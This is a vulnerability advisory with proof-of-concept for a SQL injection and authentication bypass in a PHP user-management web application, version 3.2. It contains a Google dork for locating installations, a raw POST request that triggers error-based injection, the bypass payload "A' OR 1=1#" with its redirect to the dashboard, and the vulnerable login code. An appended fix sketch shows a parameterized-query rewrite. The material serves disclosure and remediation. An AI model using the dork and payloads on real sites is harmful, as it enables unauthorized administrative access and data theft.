`@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
.:. Exploit Title > User Registration & Management System - SQLi
.:. Google Dorks .:.
inurl:loginsystem/index.php
.:. Date: June 18, 2024
.:. Exploit Author: bRpsd
.:. Contact: cy[at]live.no
.:. Vendor -> https://phpgurukul.com/
.:. Product -> https://phpgurukul.com/?sdm_process_download=1&download_id=7003
.:. Product Version -> Version 3.2
.:. DBMS -> MySQL
.:. Tested on > macOS [*nix Darwin Kernel], on local xampp
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
#############
|DESCRIPTION|
#############
"User Management System is a web based technology which manages user database and provides rights to update their details. In this web application user must be registered. This web application provides a way to effectively control record & track the user details who himself/herself registered with us."
===========================================================================================
Vulnerability 1: Unauthenticated SQL Injection & Authentication bypass
Types: error-based
File: localhost/admin/index.php
Vul Parameter: USERNAME [POST]
POST PoC #1: http://tom:8080/loginsystem/admin/index.php
Host: tom
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:127.0) Gecko/20100101 Firefox/127.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 38
Origin: http://tom
Connection: keep-alive
Referer: http://tom/loginsystem/admin/index.php
Cookie: PHPSESSID=fca5cef217b48f9ec0221b75695e4f2a
Upgrade-Insecure-Requests: 1
username='&password=test&login=
Response: Warning: mysqli_fetch_array() expects parameter 1 to be mysqli_result, bool given in /Applications/XAMPP/xamppfiles/htdocs/loginsystem/admin/index.php on line 9
===========================================================================================
Test #2 => Payload to skip authentication
http://localhost:9000/loginsystem/admin/index.php
username=A' OR 1=1#&password=1&login=
Response:
302 redirect to dashboard.php
===========================================================================================
Vuln File:/loginsystem/admin/index.php
Vul Code:
<?php session_start();
include_once('../includes/config.php');
// Code for login
if(isset($_POST['login']))
{
$adminusername=$_POST['username'];
$pass=md5($_POST['password']);
$ret=mysqli_query($con,"SELECT * FROM admin WHERE username='$adminusername' and password='$pass'");
$num=mysqli_fetch_array($ret);
if($num>0)
`
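Fix sketch (added example, not the vendor's code and not part of the original advisory): the same login check with a parameterized query, so the payloads in PoC #1 and Test #2 are treated as data. It assumes $con is the mysqli handle from ../includes/config.php and that the admin table has the username/password columns seen in the vulnerable query; the helper name admin_login and the session key are hypothetical.

```php
<?php
declare(strict_types=1);

// Returns true only when exactly one admin row matches (helper name is hypothetical).
function admin_login(mysqli $con, string $username, string $password): bool
{
    try {
        // Placeholders keep input out of the SQL text: a lone ' or "A' OR 1=1#"
        // is compared as a literal username instead of being parsed as SQL.
        $stmt = $con->prepare('SELECT username FROM admin WHERE username = ? AND password = ?');
        if ($stmt === false) {
            throw new mysqli_sql_exception($con->error);
        }
        // md5() is kept only to match the hashes the original query compares against.
        $hash = md5($password);
        $stmt->bind_param('ss', $username, $hash);
        if (!$stmt->execute()) {
            throw new mysqli_sql_exception($stmt->error);
        }
        $stmt->store_result();
        $matched = ($stmt->num_rows === 1);
        $stmt->close();
        return $matched;
    } catch (mysqli_sql_exception $e) {
        error_log('admin login query failed: ' . $e->getMessage());
        return false; // fail closed; no database detail reaches the client
    }
}

ini_set('display_errors', '0'); // warnings with file paths stay out of responses
session_start();
include_once('../includes/config.php'); // provides $con, as in the original file

if (isset($_POST['login'])) {
    // Reject non-string input such as username[]=x before it reaches the query.
    $username = is_string($_POST['username'] ?? null) ? $_POST['username'] : '';
    $password = is_string($_POST['password'] ?? null) ? $_POST['password'] : '';
    if (admin_login($con, $username, $password)) {
        session_regenerate_id(true);
        $_SESSION['admin_user'] = $username; // session key name is an assumption
        header('Location: dashboard.php');
        exit;
    }
    http_response_code(401);
    echo 'Invalid username or password.';
}
```

Unsalted MD5 remains a weak password store even with the injection closed; moving the column to password_hash() / password_verify() is the follow-up change.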